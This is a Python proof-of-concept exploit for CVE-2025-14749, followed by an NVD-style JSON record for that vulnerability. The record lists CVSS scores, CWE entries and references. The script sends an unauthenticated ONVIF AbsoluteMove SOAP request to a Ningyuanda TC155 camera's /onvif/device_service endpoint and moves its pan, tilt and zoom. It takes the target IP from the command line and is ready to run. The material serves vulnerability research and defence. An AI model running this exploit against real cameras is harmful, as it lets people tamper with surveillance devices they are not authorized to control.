CVE-2025-14749

import requests import xml.etree.ElementTree as ET # CVE-2025-14749 PoC - Ningyuanda TC155 ONVIF PTZ Unauthorized Access # Target: Ningyuanda TC155 < 57.0.2.0 # Component: /onvif/device_service PTZ Control Interface TARGET_IP = "<target_ip>" ONVIF_PORT = 554 PROFILE_TOKEN = "Profile_1" # ONVIF namespaces NAMESPACES = { 's': 'http://www.w3.org/2003/05/soap-envelope', 'tptz': 'http://www.onvif.org/ver20/ptz/wsdl', 'tt': 'http://www.onvif.org/ver10/schema' } def create_ptz_move_request(profile_token, pan=0.5, tilt=0.0, zoom=0.0): """Generate ONVIF AbsoluteMove request for PTZ control""" soap_body = f''' <tptz:AbsoluteMove> <tptz:ProfileToken>{profile_token}</tptz:ProfileToken> <tptz:Position> <tt:PanTilt x="{pan}" y="{tilt}" space="http://www.onvif.org/ver10/tptz/PanTiltSpaces"/> <tt:Zoom x="{zoom}" space="http://www.onvif.org/ver10/tptz/ZoomSpaces"/> </tptz:Position> </tptz:AbsoluteMove> ''' soap_envelope = f'''<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"> <s:Body>{soap_body}</s:Body> </s:Envelope>''' return soap_envelope def exploit_cve_2025_14749(target_ip, port=ONVIF_PORT, profile=PROFILE_TOKEN): """Exploit CVE-2025-14749 - Unauthorized PTZ Control""" url = f"http://{target_ip}:{port}/onvif/device_service" headers = { 'Content-Type': 'application/soap+xml; charset=utf-8', 'SOAPAction': 'http://www.onvif.org/ver20/ptz/wsdl/AbsoluteMove' } # Send unauthorized PTZ move command payload = create_ptz_move_request(profile, pan=1.0, tilt=0.5, zoom=0.5) try: response = requests.post(url, data=payload, headers=headers, timeout=10) print(f"[*] Request sent to {url}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code == 200 and 'Fault' not in response.text: print("[+] PTZ control command executed successfully!") print("[+] Camera pan/tilt/zoom may have been manipulated") return True else: print("[-] Attack may have failed or device not vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: TARGET_IP = sys.argv[1] exploit_cve_2025_14749(TARGET_IP)

{"cve": {"id": "CVE-2025-14749", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:57.840", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Ningyuanda TC155 57.0.2.0. This impacts an unknown function of the file /onvif/device_service of the component ONVIF PTZ Control Interface. The manipulation leads to improper access controls. The attack requires being on the local network. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.5, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC8CEF63-8B37-4D17-8C31-4BD41E7B8D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DC27CA3-9706-448B-8C91-E413B1F05656"}]}]}], "references": [{"url": "https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-PTZ-Remote-Control.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336522", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336522", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707198", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}